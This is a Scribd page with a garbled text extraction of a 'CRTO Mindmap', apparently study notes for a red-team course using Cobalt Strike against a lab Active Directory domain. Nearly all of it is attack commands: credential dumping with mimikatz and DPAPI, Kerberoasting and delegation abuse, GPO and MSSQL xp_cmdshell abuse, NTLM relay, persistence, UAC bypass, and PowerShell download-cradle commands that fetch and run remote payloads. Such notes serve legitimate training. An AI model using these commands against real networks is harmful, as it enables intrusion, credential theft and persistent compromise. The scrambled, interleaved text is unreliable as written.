Scribd
Upload
405 views1 page

CRTO Mindmap

Uploaded by

Marc Vives
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
405 views1 page

CRTO Mindmap

Uploaded by

Marc Vives
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

‎Payload = Beacon HTTP/S

‎Port = 80/443

‎HTTP/S ‎HTTP Hosts = IP/domain

‎HTTP Host (stager) = IP/domain


‎Beacon => TeamServer
‎Egress
‎Payload = Beacon DNS

‎DNS Hosts = sub.domain.es


‎DNS
‎DNS Host (stager) = sub.domain.es

‎Listener Management ‎Payload = Beacon TCP

‎Port = XXXX
‎TCP
‎Yes = tcp-local (127.0.0.1)
‎Bind to localhost only
‎Beacon => Beacon
‎P2P ‎No = tcp (0.0.0.0)

‎Payload = Beacon SMB

‎SMB ‎Pipename (C2)

‎PS C:\> ls \\.\pipe\

‎ SVCPIPE-5a71ebb3-cc01-49a9-bd85-
T
‎4bbd37495169

‎Generate .hta
‎HTA (HTML Application)

‎Generate a VBA for Macros


‎MS Office Macro

‎ nly generates payloads for egress


O
‎listeners, but supports x86 and x64.
‎Stager Payload Generator

‎As above, include P2P.


‎Generating Payloads ‎Stageless Payload Generator ‎Generate All Payloads at the start

‎EXE, Service EXE or DLL


‎Starting CS ‎Windows Stager Payload

.‎EXE, Service EXE, DLL, shellcode, as well as


‎PowerShell. Only for P2P.
‎Windows Stageless Payload

‎ enerate every stageless payload variant,


G
‎for every listener, in x86 and x64
‎Windows Stageless Generate All Payloads

‎Right click on Beacon > Pivoting > Listener


‎Pivot Listeners

s‎ udo vim
‎/etc/systemd/system/teamserver.service
‎Running As a Service

.‎/agscript [host] [port] [user] [password] [script.


‎cna] ‎ls \\gpcfilesyspath\Machine ‎download registry.pol ‎Parse-PolFile .\Desktop\Registry.pol
‎GetConfig ‎User

‎ payload = artifact_payload("listener_
$
‎Headless CS ‎agscript ‎name", "payload_type", "arch"); ‎ owershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } |
p
‎select DisplayName, Name, GPCFileSysPath | fl
‎on ready{...} event ‎gpcfilesyspath
‎script.cna s‎ ite_host("ip_server", port, "/resource", $
‎payload, "text/plain", "description", false);
‎ owershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-
p
‎AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
.‎/build.sh pipe VirtualAlloc 277492 5 false
‎false /mnt/c/Tools/cobaltstrike/artifacts ‎LAPS ‎Powerview ‎Principals allowed to read Password
‎Disk ‎Artifact Kit ‎powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
‎System
‎Cobalt Strike > Script Manager > Load ‎psexec/psexec64
.‎/build.sh /mnt/c/Tools/cobaltstrike/ ‎powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
‎resources ‎Computers with LAPS
‎jump [method] [target] [listener(SMB)] ‎psexec_psh (32bits)
‎Memory ‎Resource Kit ‎jump
‎powershell Get-DomainComputer -Identity <Computer> -Properties ms-Mcs-AdmPwd ‎make_token .\LAPSAdmin Password
‎winrm/winrm64
‎ ost-ex {
p ‎Read password
‎Bypass ‎ set amsi_disable "true";
‎winrm
‎ ‎ owershell-import C:\Tools\LAPSToolkit\
p
‎ set spawnto_x64 "%windir%\\ ‎LAPSToolkit.ps1
‎sysnative\\dllhost.exe"; ‎psexec
‎ set spawnto_x86 "%windir%\\ ‎LAPSToolkit ‎remote-exec [method] [target] [command]
‎powershell Find-LAPSDelegatedGroups ‎remote-exec
‎syswow64\\dllhost.exe"; ‎cd \\target\share$
‎} ‎./c2lint c2-profiles/normal/webbug.profile ‎Restart
‎Cobalt Profile
‎upload paylaod-smb.exe
‎Movimiento lateral ‎wmi ‎link target pipe

r‎ emote-exec wmi target.domain C:\ ‎User


‎Windows\payload-smb.exe

‎ owershell Invoke-DCOM -ComputerName


p
‎Sysmon64 ‎wtarget -Method MMC20.Application -
‎Command C:\Windows\payload-smb.exe
‎Invoke-DCOM.ps1
‎MsMpEng (Defender)
‎Processes ‎ps
‎Web Credentials ‎spawn as
‎elastic-XXX ‎If credentials or user are interesting
‎run vaultcmd /list ‎Vault GUID
‎Vaults r‎ un vaultcmd /listcreds:"Windows
‎getprivs ‎Windows Credentials ‎Credentials" /all
‎Privileges
l‎s C:\Users\bfarmer\AppData\Local\
‎net logons ‎Microsoft\Credentials
‎User Sessions ‎DPAPI ‎BLOBS ‎mimikatz !sekurlsa::logonpasswords
‎MasterKey GUID
‎+
‎NTLM Hashes ‎pth Domain\User HashNTLM
‎-group=system l‎s C:\Users\User\AppData\Roaming\ ‎BLOB ‎logonpasswords
‎PTH
‎Microsoft\Protect\S-X-X-XX
‎ ow
H ‎MasterKey GUID ‎mimikatz !lsadump::sam
‎List Vaults ‎SAM
‎WindowsVault
‎DPAPI ‎mimikatz !sekurlsa::ekeys ‎aes256_hmac (first and large)
‎Kerberos AES256 Keys
‎WindowsCredentialFiles
‎ owershell Get-DomainComputer -Domain dev-studio.com -
p
‎Properties DnsHostName ‎mimikatz !lsadump::cache
‎Certificates
‎Get DC Server ‎Mimikatz ‎DCC
‎Seatbelt.exe ‎Certificates
‎JUMP
‎OSInfo -ComputerName=Hostname ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\
e ‎execute-assembly C:\Tools\Rubeus\ ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\
e
‎bin\Release\Rubeus.exe asktgt /user: ‎Rubeus\bin\Release\Rubeus.exe asktgs / ‎bin\Release\Rubeus.exe asktgs /service:cifs/ ‎Hashcat => $DCC2$<iterations>#<username>#<hash>
‎Pivoting ‎Inbound
‎ owershell Get-
p ‎ owershell Get-DomainGroupMember -
p ‎nlamb /domain:dev.cyberbotic.io /aes256: ‎service:krbtgt/dev-studio.com /domain:dev. ‎dc.dev-studio.com /domain:dev-studio.
‎DomainForeignGroupMember -Domain ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎Identity "Studio Admins" | select ‎a779fa8afa28d66d155d9d7c14d394359c5d ‎cyberbotic.io /dc:dc-2.dev.cyberbotic.io / ‎com /dc:dc.dev-studio.com /ticket:doIFoz[...] ‎mimikatz lsadump::dcsync
‎TokenPrivileges
‎dev-studio.com ‎569305411-121244042-2357301523-1120 ‎MemberName ‎29a86b6417cb94269e2e84c4cee4 /nowrap ‎ticket:doIFwj[...]MuaW8= /nowrap ‎NPTQ== /nowrap
‎PrivEsc
‎Find users outside of its domain ‎Obtain members ‎Pwn user and ASKTGT ‎Referal Ticket ‎TGS for service in trusting domain ‎PTT ‎Jump Psexec ‎DCSync
‎Trusts ‎dcsync domain.controller.domain Domain\krbtgt
‎ DSearch.exe --search "(&(objectCategory=
A
‎ owershell Get-DomainObject -Identity "
p ‎ imikatz @lsadump::dcsync /domain:
m ‎ xecute-assembly C:\Tools\ADSearch\ADSearch\
e ‎ xecute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /
e
‎group)(cn=*Admins))" ‎mimikatz !sekurlsa::dpapi (as admin)
‎CN=msp.org,CN=System,DC=cyberbotic,DC= ‎cyberbotic.io /guid:{b93d2e36-48df-46bf- ‎bin\Release\ADSearch.exe --search "( ‎user:CYBER$ /domain:msp.org /rc4:f3fc2312d9d1f80b78e67d55d41ad496 /
‎Groups with "admins" ‎ imikatz dpapi::cred /in:C:\Users\USer\
m ‎Plain text password ‎make_token .\User Pass
‎io" | select objectGuid ‎89d5-2fc22c139b43} ‎objectCategory=user)" ‎nowrap ‎Impersonation
‎ ou need domain admin
Y ‎Masterkey ‎AppData\Local\Microsoft\Credentials\
‎Outbound ‎Obtain TDO ‎Search Trusts Accounts ‎ASKTGT ‎ imikatz dpapi::masterkey /in:C:\Users\
m
‎in trusting domain ‎DPAPI ‎BLOB /masterkey:key_obtained
‎ DSearch.exe --search "(&(objectCategory=
A ‎User\AppData\Roaming\Microsoft\Protect\
‎user)(servicePrincipalName=*))" --attributes ‎S-X-X-XX-\masterkeyGUID /rpc ‎More OPSEC, no lsass interact
‎cn,servicePrincipalName,
‎samAccountName ‎Admins=> all tickets
‎Kerberoasting ‎
‎Validate: ‎rev2self
‎Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap ‎ ubeus.exe createnetonly /program:C:\
R
‎Rubeus.exe triage ‎TGT => Service krbtgt/domain ‎Extracting Kerberos Tickets ‎Get ProcessID ‎steal_token ProcessID ‎ls \\web.dev.cyberbotic.io\c$ ‎Revert
‎Windows\System32\cmd.exe /domain:dev. ‎ ubeus.exe ptt /luid:0x798c2c /ticket:
R
‎ DSearch.exe --search "(&(objectCategory=
A ‎List Kerberos Tickets ‎kill ProcessID
‎cyberbotic.io /username:bfarmer / ‎doIFuj[...]lDLklP
‎Reconnaissance ‎user)(userAccountControl:1.2.840.113556.1.4.
‎TGS => Services/domain ‎password:FakePass123
‎803:=4194304))" --attributes cn,
‎ DSearch
A ‎ ubeus
R
‎distinguishedname,samaccountname ‎TGT/TGS ‎Pass The Ticket
‎ ‎
‎ASReproasting ‎ harpSpoolTrigger.exe target_machine
S ‎ ubeus.exe createnetonly /program:C:\
R
‎execute-assembly C:\Tools\ADSearch\ ‎execute-assembly C:\Tools\Rubeus\
‎ADSearch\bin\Release\ADSearch.exe ‎listener_machine (vulnerable on ‎Windows\System32\cmd.exe /domain:
‎Rubeus\bin\Release\Rubeus.exe ‎Unconstrained) ‎DEV /username:nlamb /password:
‎ DSearch.exe --search "(&(objectCategory=
A
‎computer)(userAccountControl:1.2.840. ‎Rubeus.exe monitor /interval:10 /nowrap ‎FakePass /ticket:doIFwj[...]MuSU8=
‎CRTO ‎113556.1.4.803:=524288))" --attributes ‎Force auth ‎Ends with job & jobkill
‎samaccountname,dnshostname ‎Admin on vuln machines
‎Unconstrained
‎ ubeus.exe s4u /impersonateuser:nlamb /
R
‎self /altservice:cifs/dc-2.dev.cyberbotic.io /
‎ DSearch.exe --search "(&(objectCategory=
A
‎TGT from machine account will fail ‎user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap / ‎Fails
‎computer)(msds- ‎dnshostname:machine
‎(Unconstrained) ‎ptt
‎allowedtodelegateto=*))" --attributes
‎S4U2Self ‎OK
‎dnshostname,samaccountname,msds-
‎ wn User Trusted for delegation (
P
‎allowedtodelegateto --json ‎Admin on dnshostname
‎SamAccountName) ‎ ubeus.exe s4u /impersonateuser:nlamb /
R
‎Constrained
‎ ubeus.exe asktgt /user:jking /ntlm:5...c /
R
‎msdsspn:cifs/dc-2.dev.cyberbotic.io /
‎NTLM ‎nowrap
‎Services allowed on machine ‎altservice:ldap /user:sql-2$ /ticket:doIFpD[...]
‎TGT ‎Use TGS/TGT for PTT
‎ GT of principal (user or machine) trusted
T ‎MuSU8= /nowrap
‎ ES256
A ‎ ubeus.exe asktgt /user:jking /aes256:4...c6 /
R ‎for constrained delegation ‎ ‎DCSync
‎ owershell $rsd = New-Object Security.
p
‎(More OPSEC) ‎domain:DEV /opsec /nowrap ‎/altservice
‎AccessControl.RawSecurityDescriptor "O:
‎BAD:(A;;
‎ ubeus.exe s4u
R
‎ owershell Get-DomainComputer | Get-
p ‎CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<
‎ ubeus.exe asktgt /user:jking /aes256:4...6 /
R ‎/impersonateuser:<user_to_impersonate>
‎DomainObjectAcl -ResolveGUIDs | ? { $_. ‎SID>)"; $rsdb = New-Object byte[] ($rsd. ‎Over Pass The Hash
‎OPTH+PTT ‎domain:DEV /opsec /nowrap /ptt ‎/msdsspn:<service allowed to delegate>
‎ActiveDirectoryRights -match " ‎BinaryLength); $rsd.GetBinaryForm($rsdb,
‎Machine TGT ‎/user:<principal TGT pwnd>
‎WriteProperty|GenericWrite|GenericAll| ‎Privs on computer ‎0); Get-DomainComputer -Identity "dc-2" |
‎ ubeus.exe asktgt /user:nlamb /certificate:<
R ‎/ticket:<TGT for /user> ‎OK
‎WriteDacl" -and $_.SecurityIdentifier - ‎ ‎Set-DomainObject -Set @{'msDS-
‎Base64Cert> /password:<cert_pass> (not ‎/nowrap
‎match "S-1-5-21-569305411-121244042- ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎ owershell Get-DomainComputer -Identity
p ‎AllowedToActOnBehalfOfOtherIdentity' = $
‎Certificates ‎necessary) /nowrap ‎S4U (S4U2Self+S4U2Proxy) ‎Fails
‎2357301523-[\d]{4,10}" } ‎569305411-121244042-2357301523-1107 ‎wkstn-2 -Properties objectSid ‎rsdb} -Verbose
‎RCBD ‎TGT of machine trusted for RCBD
‎Whitout localadmin
‎ owershell Get-DomainTrust -Domain <
p ‎Rubeus.exe kerberoast /simple /nowrap
‎powershell Get-DomainTrust ‎Domain> (CHECK ALL)
‎Trusts
‎Kerberoasting ‎Opsec ‎Rubeus.exe kerberoast /user:user /nowrap ‎ owershell Get-DomainObject -Identity "
p
‎powershell Get-DomainComputer | ? { $_."ms-Mcs- ‎DC=dev,DC=cyberbotic,DC=io" -Properties
‎ sktgt /user:dc-2$ /certificate:MIIJuA[...snip...]
a ‎Check addComputers ‎ms-DS-MachineAccountQuota
‎Computers With LAPS ‎AdmPwdExpirationTime" -ne $null } | select dnsHostName ‎ICB9A= /password:"y52EhYqlfgnYPuRb" /
‎ owerView
P ‎Abuse ‎nowrap
‎Rubeus.exe asreproast /simple /nowrap
‎ ‎ owershell Get-DomainGPO | ? { $_.DisplayName -like "*
p ‎ tandIn.exe --computer EvilComputer --
S
‎LAPS
‎powershell-import C:\Tools\PowerSploit\ ‎LAPS GPOs ‎laps*" } | select DisplayName, Name, GPCFileSysPath | fl ‎gpcfilesyspath ‎make ‎Get Password
‎Recon\PowerView.ps1 ‎ASReproasting ‎ ubeus.exe asreproast /user:squid_svc /
R
‎Opsec ‎nowrap
‎powershell Find-DomainShare -CheckShareAccess ‎ ubeus.exe hash /password:
R
‎oIrpupAtF1YCXaw /user:EvilComputer$ /
‎SHARES ‎domain:dev.cyberbotic.io ‎Get AES256
‎powershell Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*

‎ ubeus.exe asktgt /user:EvilComputer$ /


R
‎GPOs ‎aes256:
‎7A79DCC14E6508DA9536CD949D857B54A
‎ owershell Get-DomainGroup -Identity *SQL* | % { Get-
p ‎ xecute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /
e ‎ xecute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe add /
e ‎E4E119162A865C40B3FFD46059F7044 /
‎DomainGroupMember -Identity $_.distinguishedname | select ‎target:dc-2$ ‎target:dc-2$ ‎nowrap
‎GetUsers from group that contains XXX ‎groupname, membername } ‎Shadow Credentials ‎Add new key
‎MSSQL ‎ owershell Get-DomainGPO -Identity "<ObjectDN>" | select
p
‎ owershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.
p ‎displayName, gpcFileSysPath ‎ harpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\
S
‎powershell Get-SQLInstanceDomain ‎ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier - ‎GPO ‎dns_x64.exe" --GPOName "Vulnerable GPO"
‎Discover Servers ‎AddComputerScript i‎nject any arbitrary shellcode from a binary
‎match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
‎Check modifiable ‎ owershell ConvertFrom-SID S-1-5-21-
p ‎ owershell Find-DomainShare -
p ‎ harpGPOAbuse
S ‎file on your attacking machine
‎569305411-121244042-2357301523-1107 ‎Find writeable share ‎CheckShareAccess ‎Upload payload ‎ ‎Rport Forward & rules FW (need admin) ‎shinject
‎ owershell Get-SQLInstanceDomain | Get-
p ‎gpupdate /force
‎ owershell Get-SQLServerInfo -Instance "
p ‎SQLConnectionTest | ? { $_.Status -eq " ‎OU ‎Modify ‎execute-assembly C:\Tools\ ‎Apply GPO
‎server.fqdn,1433" ‎Accessible" } | Get-SQLServerInfo ‎SharpGPOAbuse\SharpGPOAbuse\bin\ ‎Process Injection i‎nject a full Beacon payload for the
‎ harpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --
S
‎Get info ‎Check All Servers ‎Release\SharpGPOAbuse.exe ‎specified listener ‎inject PID arch P2PListenerName
‎ owershell Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" |
p ‎Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -enc EncBase64=" --GPOName "
‎select distinguishedName ‎AddComputerTask ‎Vulnerable GPO" ‎inject
‎ owershell Get-SQLConnectionTest -
p
‎Instance "server.fqdn,1433" | fl ‎Check what OU applies to GPO ‎powershell Get-DomainComputer -SearchBase "distinguishedname" | select dnsHostName ‎It is inmediate
‎Validate Connection
‎PowerUpSQL ‎GPOs ‎PowerView
‎ ‎Find writeable share
‎powershell Get-SQLQuery -Instance "sql-2.
‎powershell-import C:\Tools\PowerUpSQL\
‎dev.cyberbotic.io,1433" -Query "<query>"
‎PowerUpSQL.ps1 ‎powershell New-GPO -Name "Evil GPO"
‎Execute queries
‎ owershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.
p
‎powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433" ‎ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match " ‎ owershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -
p
‎Lateral Movement ‎ owershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -
p ‎WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType, ‎Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" - ‎Reboot
‎SecurityIdentifier | fl ‎Create ‎ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\
‎ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -
‎contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier } ‎dns.exe" -Type ExpandString
‎ owershell Invoke-SQLOSCmd -Instance "sql-2.dev.
p ‎ owershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,
p
‎Create ‎who can create ‎Check OU links ‎powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
‎cyberbotic.io,1433" -Command "whoami" -RawResults ‎1433" -Command "command (escape \")" -RawResults
‎Command Execution ‎ owershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,
p
‎DC=dev,DC=cyberbotic,DC=io"

‎SQLColumnSampleDataThreaded

‎SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami


‎Check our roles & rigths

‎ QLRecon.exe -a windows -s sql-2.dev.


S
‎SQLRecon
‎cyberbotic.io,1433 -m query -o "<query>"

‎Execute queries
‎execute-assembly C:\Tools\SQLRecon\
‎SQLRecon\bin\Release\SQLRecon.exe ‎Certify.exe cas
‎ QLRecon\bin\Release\SQLRecon.exe -a
S ‎Find CAS
‎ QLRecon.exe -a windows -s sql-2.dev.
S ‎windows -s sql-2.dev.cyberbotic.io,1433 -m
‎MSSQL ‎cyberbotic.io,1433 -m impersonate ‎iwhoami -i DEV\mssql_svc ‎ ave cert in cert.pem file
S
‎Check impersonation ‎msPKI-Certificate-Name-Flag ‎ENROLLEE_SUPPLIES_SUBJECT
‎(WSL)
‎ ertify.exe request /ca:dc-2.dev.cyberbotic.
C
‎Domain\mssql_svc ‎Check Kerberoasting ‎Enrollment Rights
‎Certify.exe find /vulnerable ‎io\sub-ca /template:CustomUser /altname:< ‎openssl pkcs12 -in cert.pem -keyex -CSP "
‎Search SPN for mssql service ‎Templates ‎user> ‎Microsoft Enhanced Cryptographic
‎Write Owner ‎Abuse ‎Provider v1.0" -export -out cert.pfx
‎SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'; ‎Permissions
‎Principal owned
‎Certify
‎WriteDACL ‎cat cert.pfx | base64 -w 0
‎Impersonation ‎SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals; ‎
‎ADCS ‎Base64 for Rubeus
‎execute-assembly C:\Tools\Certify\Certify\
‎bin\Release\Certify.exe ‎WriteProperty
‎EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
‎ xecute-assembly C:\Tools\SharpSystemTriggers\
e
‎SELECT srvname, srvproduct, rpcout FROM master..sysservers; ‎SharpSpoolTrigger\bin\Release\
‎sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server ‎SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
‎SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername'); ‎Relay ‎Config
‎Lateral movement
‎ ELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.
S ‎User
‎ ELECT * FROM OPENQUERY("sql-1.cyberbotic.
S
‎configurations WHERE name = ''xp_cmdshell''');
‎io", 'select @@servername; exec xp_cmdshell '' ‎Persistence ‎Computer ‎S4U2Self
‎powershell -w hidden -enc EncBase64 ''')
‎ roxychains mssqlclient.py -windows-auth
p ‎ XEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.
E ‎Beacon
‎Remote Code Execution ‎Binary Path
‎DEV/bfarmer@10.10.122.25 ‎cyberbotic.io]
‎Impacket-mssqlclient ‎Execute queries ‎run sc query (Service)

‎EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io] ‎Startup Type


‎run sc qc Service

s‎ p_configure 'Show Advanced Options', 1; ‎Service Status


‎RECONFIGURE; ‎run sc start Service ‎Check
‎ ELECT value FROM sys.configurations
S ‎Windows Services
‎Log On As
‎Enable xp_cmdshell ‎WHERE name = 'xp_cmdshell'; ‎run sc stop Service
s‎ p_configure 'xp_cmdshell', 1;
‎RECONFIGURE; ‎Dependants & Dependences
‎powershell Get-Service
‎EXEC xp_cmdshell 'whoami';
‎sudo ss -lpnt
‎Check if listen ‎upload service.exe
‎Execute command ‎ XEC xp_cmdshell 'powershell -w hidden -c "iex (new-
E
‎object net.webclient).downloadstring("""http://wkstn-2:
‎mv service.exe serviceVuln.exe
‎Beacon ‎8080/b""")"';
‎SharpUp.exe audit UnquotedServicePath
‎Visibilty, Rule & PortForward
‎Unquoted Service Paths ‎Create and upload .exe ‎run sc stop VulnService1
‎ harPersist.exe -t schtask -c "C:\Windows\
S ‎sudo vim /etc/proxychains.conf
‎System32\WindowsPowerShell\v1.0\
‎powershell.exe" -a "-nop -w hidden -enc ‎ roxychains nmap -n -Pn -sT -p445,3389,
p ‎run sc start VulnService1
‎Linux ‎Proxychains ‎ harpUp.exe
S ‎run sc qc NameVulnService
‎BASE64" -n "Updater" -m add -o hourly ‎4444,5985 10.10.122.10
‎Task Scheduler ‎ ‎Get vuln path
‎Socks 4 ‎socks 1080
‎execute-assembly C:\Tools\SharpUp\
‎Connect r‎ unas /netonly /user:DEV\bfarmer mmc. ‎SharpUp\bin\Release\SharpUp.exe
‎ harPersist.exe -t startupfolder -c "C:\
S ‎ServiceRights: ChangeConfig ‎upload C:\Payloads\tcp-local_x64.svc.exe
‎Socks 5 ‎socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging ‎Config ‎exe (powershell as admin) ‎powershell-import C:\Tools\Get-ServiceAcl.ps1
‎Windows\System32\ ‎Upload payload
‎Socks Proxy
‎WindowsPowerShell\v1.0\powershell. ‎SharpUp.exe audit ModifiableServices ‎Check ‎IdentityReference: myUser
‎Windows ‎Proxifier ‎Allow us to map ADCU => interesting for enum ‎ owershell Get-ServiceAcl -Name
p
‎exe" -a "-nop -w hidden -enc BASE64" -f " ‎socks stop ‎Weak Service Permissions ‎get Modifiable Services r‎ un sc config NameVulnService binPath=
‎NameVulnService | select -expand Access ‎If is vuln
‎UserEnvSetup" -m add ‎C:\Temp\tcp-local_x64.svc.exe
‎Startup Folder ‎run netstat -anp tcp ‎connect localhost 4444
‎rportfwd [machine_port] [Cobalt IP] [Cobalt Port] ‎Privilege Escalation ‎Reconfigure binary
‎Firewall rules (as admin) ‎Check if listen ‎CreateFiles privilege
‎Visibilty, Rule & PortForward
‎ harPersist.exe -t reg -c "C:\ProgramData\
S ‎Reverse Port Forward ‎rportfwd stop ‎run sc stop NameVulnService
‎SharpPersist.exe ‎Payload.exe" -a "/q /n" -k "hklmrun" -v " ‎ ny user logon
A
‎ServiceName" -m add ‎(SYSTEM privs) ‎search unquoted and spaced paths ‎download service.exe
‎ owershell Get-Acl -Path "C:\ServicePath\
p ‎Stop and then start the service ‎run sc start NameVulnService
i‎ f P2P ‎Pivoting ‎rportfwd 8445 localhost 445 ‎Unquoted Service Paths ‎run wmic service get name, pathname
‎Service-file" | fl (find a file writeable)
‎Connect / Link
‎ harPersist.exe -t reg -c "C:\ProgramData\
S ‎copy "tcp-local_x64.svc.exe" "service.exe"
‎Registry Autorun ‎rportfwd 8080 localhost 80 ‎PortForward
‎Payload.exe" -a "/q /n" -k "hkcurun" -v "
‎ServiceName" -m add ‎Specify user logon ‎Modify privilege
‎run sc stop service.exe
‎socks 1080 socks5 disableNoAuth socks_user socks_password EnableLogging
‎Use SVC payload ‎upload tcp-local_x64.svc.exe ‎upload service.exe
s‎ udo proxychains ntlmrelayx.py -t smb://10.10.122.10 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc
‎Firewall rules (as admin) ‎aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQA
‎mv tcp-local_x64.svc.exe legit-svc.exe ‎NTLM Relaying
‎ ervices
S ‎cwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQAyADMALgAxADAAMgA6ADgAMAA4ADAALwBiACIAKQA=' ( ‎Weak Service Permissions
‎( OK 4 privs) ‎no cobalt ip)
‎Host Persistence
‎ harPersist.exe -t service -c "C:\Windows\
S
‎legit-svc.exe" -n "legit-svc" -m add ‎run netstat -anp tcp ‎Weak Service Binary Permissions
‎Reboot ‎connect localhost 4444 ‎cd C:\Windows\system32\drivers

‎elevate uac-schtasks tcp-local ‎run sc start NameVulnService3


‎upload C:\Tools\PortBender\WinDivert64.sys ‎UAC Bypasses ‎Elevate Kit ‎NT Authority\System
‎COM Hijacks ‎PortBender redirect 445 8445
‎Portbender (SYSTEM)
‎ obalt Strike > Script Manager > load
C ‎Seatbelt.exe TokenPrivileges ‎SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc EncBase64"
‎powershell-import C:\Tools\PowerLurk.ps1
‎PortBender.cna ‎SweetPotato.exe ‎SeImpersonatePrivilege
‎EventConsumer ‎ owershell Register-MaliciousWmiEvent -
p ‎Create ‎powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
‎EventName WmiBackdoor -
‎WMI Event Subscriptions ‎EventFilter ‎PowerLurk.ps1 ‎PermanentCommand "C:\Windows\dns_ ‎Firewall rules (as admin)
‎x64.exe" -Trigger ProcessStart - ‎Delete ‎powershell Remove-NetFirewallRule -DisplayName "8445-In"
‎ProcessName notepad.exe
‎FilterToConsumerBinding ‎

‎CRTO ‎Starting CS ‎Listener Management ‎Egress ‎Beacon => TeamServer ‎HTTP/S ‎Payload = Beacon HTTP/S ‎Port = 80/443 ‎HTTP H

You might also like